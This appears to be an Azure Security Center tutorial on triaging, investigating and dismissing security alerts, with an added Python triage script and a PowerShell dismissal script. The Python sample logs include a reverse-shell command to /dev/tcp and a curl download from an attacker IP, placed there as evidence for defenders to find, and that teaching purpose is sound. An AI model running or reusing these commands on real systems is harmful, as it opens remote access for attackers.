Tutorial: Triage, investigate, and respond to security alerts

Security Center continuously analyzes your hybrid cloud workloads using advanced analytics and threat intelligence to alert you about potentially malicious activities in your cloud resources. You can also integrate alerts from other security products and services into Security Center. Once an alert is raised, swift action is needed to investigate and remediate the potential security issue.

In this tutorial, you will learn how to:

  • Triage security alerts
  • Investigate a security alert to determine the root cause
  • Respond to a security alert and mitigate that root cause

If you don't have an Azure subscription, create a free account before you begin.

Prerequisites

To step through the features covered in this tutorial, you must have Azure Defender enabled. You can try Azure Defender at no cost. To learn more, see the pricing page. The quickstart Get started with Security Center walks you through how to upgrade.

Triage security alerts

Security Center provides a unified view of all security alerts. Security alerts are ranked based on the severity of the detected activity.

Triage your alerts from the Security alerts page:

Security alerts list page

Use this page to review the active security alerts in your environment to decide which alert to investigate first.

When triaging security alerts, prioritize by severity and address the higher-severity alerts first. Learn more about alert severity in How are alerts classified?.

Tip

You can connect Azure Security Center to most popular SIEM solutions including Azure Sentinel and consume the alerts from your tool of choice. Learn more in Stream alerts to a SIEM, SOAR, or IT Service Management solution.

Investigate a security alert

When you've decided which alert to investigate first:

  1. Select the desired alert.

  2. From the alert overview page, select the resource to investigate first.

  3. Begin your investigation from the left pane, which shows the high-level information about the security alert.

    The left pane of the alert details page highlighting the high-level information

    This pane shows:

    • Alert severity, status, and activity time
    • Description that explains the precise activity that was detected
    • Affected resources
    • Kill chain intent of the activity on the MITRE ATT&CK matrix
  4. For more detailed information that can help you investigate the suspicious activity, examine the Alert details tab.

  5. When you've reviewed the information on this page, you may have enough to proceed with a response. If you need further details:

    • Contact the resource owner to verify whether the detected activity is a false positive.
    • Investigate the raw logs generated by the attacked resource, starting with the window around the alert's activity time.
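The triage and investigation steps above, as an added example that is not code from this tutorial or from Security Center: a small Python helper that orders alerts the way the page recommends (highest severity first, with dismissed alerts left out), counts active alerts per affected resource, and then pulls the raw log lines from that resource around the chosen alert's activity time. The alert field names (severity, status, timeGeneratedUtc, compromisedEntity, intent) mirror the alert properties exposed by the Security Center REST API but are an assumption here, not the full schema; the alerts and syslog-style lines are constructed sample data.

```python
# Added example for this tutorial (not Security Center's own code): rank alerts
# for triage and pull raw logs around the top alert's activity time.
from datetime import datetime, timedelta, timezone

# Security Center's four severity levels, ranked for sorting (higher first).
SEVERITY_RANK = {"High": 3, "Medium": 2, "Low": 1, "Informational": 0}

# Constructed sample alerts. Field names follow the alert `properties` object of
# the Security Center alerts REST API but are an assumption, not the full schema.
SAMPLE_ALERTS = [
    {"name": "a1", "alertDisplayName": "Suspicious process executed",
     "severity": "Medium", "status": "Active",
     "timeGeneratedUtc": "2021-03-01T10:05:00Z",
     "compromisedEntity": "vm-web-01", "intent": "Execution"},
    {"name": "a2", "alertDisplayName": "Failed SSH brute force attack",
     "severity": "Low", "status": "Active",
     "timeGeneratedUtc": "2021-03-01T10:12:00Z",
     "compromisedEntity": "vm-jump-03", "intent": "PreAttack"},
    {"name": "a3", "alertDisplayName": "Traffic from IP addresses recommended for blocking",
     "severity": "High", "status": "Dismissed",
     "timeGeneratedUtc": "2021-02-27T08:00:00Z",
     "compromisedEntity": "vm-db-02", "intent": "Probing"},
    {"name": "a4", "alertDisplayName": "Potential reverse shell detected",
     "severity": "High", "status": "Active",
     "timeGeneratedUtc": "2021-03-01T09:50:00Z",
     "compromisedEntity": "vm-web-01", "intent": "Execution"},
    {"name": "a5", "alertDisplayName": "Possible data exfiltration",
     "severity": "High", "status": "Active",
     "timeGeneratedUtc": "2021-03-01T09:30:00Z",
     "compromisedEntity": "vm-db-02", "intent": "Exfiltration"},
]

# Constructed raw syslog-style lines: "<utc timestamp> <host> <message>".
SAMPLE_LOGS = [
    "2021-03-01T09:20:10Z vm-db-02 sshd[410]: Accepted password for dba from 10.0.2.7",
    "2021-03-01T09:29:45Z vm-db-02 pg_dump[455]: dumping database prod to /tmp/prod.sql",
    "2021-03-01T09:48:12Z vm-web-01 sshd[1022]: Accepted publickey for deploy from 10.0.1.5",
    "2021-03-01T09:49:55Z vm-web-01 bash[2210]: bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
    "2021-03-01T09:51:02Z vm-web-01 sudo: deploy : COMMAND=/usr/bin/curl http://203.0.113.9/x.sh",
    "2021-03-01T10:04:40Z vm-web-01 cron[2290]: (root) CMD (/tmp/.x/run.sh)",
    "2021-03-01T10:12:03Z vm-jump-03 sshd[300]: Failed password for root from 198.51.100.4",
    "2021-03-01T11:15:00Z vm-web-01 sshd[1022]: Disconnected from user deploy 10.0.1.5",
]


def parse_utc(ts):
    """Parse an ISO-8601 UTC timestamp with a trailing 'Z' into an aware datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def triage(alerts):
    """Active alerts ordered for triage: highest severity first, newest first within a severity."""
    active = [a for a in alerts if a["status"] == "Active"]
    return sorted(
        active,
        key=lambda a: (SEVERITY_RANK[a["severity"]], parse_utc(a["timeGeneratedUtc"])),
        reverse=True,
    )


def active_alerts_per_resource(alerts):
    """Count active alerts per affected resource: several alerts on one host
    usually deserve a look before a lone alert of the same severity elsewhere."""
    counts = {}
    for a in alerts:
        if a["status"] == "Active":
            counts[a["compromisedEntity"]] = counts.get(a["compromisedEntity"], 0) + 1
    return counts


def logs_for_alert(alert, logs, window=timedelta(minutes=15)):
    """Raw log lines from the alert's resource within +/- window of the alert time."""
    t0 = parse_utc(alert["timeGeneratedUtc"])
    hits = []
    for line in logs:
        ts, host, _message = line.split(" ", 2)
        if host == alert["compromisedEntity"] and abs(parse_utc(ts) - t0) <= window:
            hits.append(line)
    return hits


if __name__ == "__main__":
    queue = triage(SAMPLE_ALERTS)
    for a in queue:
        print(f'{a["severity"]:<7} {a["timeGeneratedUtc"]} {a["compromisedEntity"]:<10} {a["alertDisplayName"]}')
    print("active alerts per resource:", active_alerts_per_resource(SAMPLE_ALERTS))
    top = queue[0]
    print(f'\nraw logs around {top["name"]} on {top["compromisedEntity"]}:')
    for line in logs_for_alert(top, SAMPLE_LOGS):
        print("  " + line)
```

With the sample data the queue starts with the reverse-shell alert on vm-web-01, and the 15-minute window around it surfaces the `/dev/tcp` redirect, the `curl` download and the cron job that follows, which is the kind of raw-log evidence that decides whether the alert is a true positive before you move on to the response steps.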

Respond to a security alert

After investigating an alert and understanding its scope, you can respond to the alert from within Azure Security Center:

  1. Open the Take action tab to see the recommended responses.

    Security alerts take action tab

  2. Review the Mitigate the threat section for the manual investigation steps necessary to mitigate the issue.

  3. To harden your resources and prevent future attacks of this kind, remediate the security recommendations in the Prevent future attacks section.

  4. To trigger a logic app with automated response steps, use the Trigger automated response section.

  5. If the detected activity isn't malicious, you can suppress future alerts of this kind using the Suppress similar alerts section. Scope the suppression rule as narrowly as the false positive allows; a broad rule also hides the true positives that match it.

  6. When you've completed the investigation into the alert and responded in the appropriate way, change the status to Dismissed.

    Setting an alert's status

    This removes the alert from the main alerts list. You can use the filter from the alerts list page to view all alerts with Dismissed status.

  7. We encourage you to provide feedback about the alert to Microsoft:

    1. Mark the alert as Useful or Not useful.

    2. Select a reason and add a comment.

      Provide feedback to Microsoft on the usefulness of an alert

    Tip

    We review your feedback to improve our algorithms and provide better security alerts.
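The status change in step 6, done from PowerShell instead of the portal, as an added example that is not code from this tutorial or from Security Center. It uses the Az.Security module (Get-AzSecurityAlert and Set-AzSecurityAlert with -ActionType Dismiss); the alert object property names used below (State, ReportedSeverity, CompromisedEntity, DetectedTimeUtc, AlertDisplayName) are what the module exposes to the best of my knowledge, so check them with Get-Member on your own version before relying on the script. The dismissal log file name is an assumption, and the script expects Connect-AzAccount to have been run already.

```powershell
# Added example (not from the tutorial): close out an alert with Az.Security
# instead of the portal. Assumes Connect-AzAccount has been run and the account
# has write access to the alert. Requires: Install-Module Az.Security
param(
    [Parameter(Mandatory)] [string] $AlertName,   # the alert's resource name, not its display name
    [Parameter(Mandatory)] [string] $Location,    # region the alert was raised in
    [string] $ResourceGroupName                   # only for resource-group-scoped alerts
)

# 1. Pull the alert and show the fields the tutorial says to review before acting:
#    severity, status, activity time, affected resource.
$getParams = @{ Name = $AlertName; Location = $Location }
if ($ResourceGroupName) { $getParams.ResourceGroupName = $ResourceGroupName }
$alert = Get-AzSecurityAlert @getParams

$alert | Select-Object AlertDisplayName, ReportedSeverity, State, DetectedTimeUtc, CompromisedEntity |
    Format-List

# 2. Only act on alerts that are still active; any other state usually means
#    someone else already handled it, so do not silently overwrite their decision.
if ($alert.State -ne 'Active') {
    Write-Warning "Alert $AlertName is in state '$($alert.State)'; nothing to do."
    return
}

# 3. Keep your own record of the decision before changing state. The portal's
#    Useful/Not useful feedback has no cmdlet equivalent, so the note lives with you.
#    (File name alert-dismissals.jsonl is an assumption for this example.)
$note = [pscustomobject]@{
    AlertName   = $AlertName
    Resource    = $alert.CompromisedEntity
    Severity    = $alert.ReportedSeverity
    DismissedAt = (Get-Date).ToUniversalTime().ToString('o')
    DismissedBy = (Get-AzContext).Account.Id
}
$note | ConvertTo-Json -Compress | Add-Content -Path .\alert-dismissals.jsonl

# 4. Change the status. -ActionType 'Activate' reopens a dismissed alert.
Set-AzSecurityAlert @getParams -ActionType 'Dismiss'
```

Run it as `.\Dismiss-Alert.ps1 -AlertName <name> -Location <region>` once the investigation is complete; the dismissed alert then drops out of the default Security alerts list exactly as it does when you set the status in the portal, and the Dismissed filter brings it back.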

End the tutorial

Other quickstarts and tutorials in this collection build on this tutorial. If you plan to continue to work with subsequent quickstarts and tutorials, keep automatic provisioning and Azure Defender enabled.

If you don't plan to continue, or you want to disable either of these features:

  1. Return to the Security Center main menu and select Pricing and settings.
  2. Select the relevant subscription.
  3. To downgrade, select Azure Defender off.
  4. To disable automatic provisioning, open the Data Collection page and set Auto provisioning to Off.
  5. Select Save.

Note

Disabling automatic provisioning does not remove the Log Analytics agent from Azure VMs that already have the agent. Disabling automatic provisioning limits security monitoring for your resources.

Next steps

In this tutorial, you learned about Security Center features to be used when responding to a security alert. For related material see: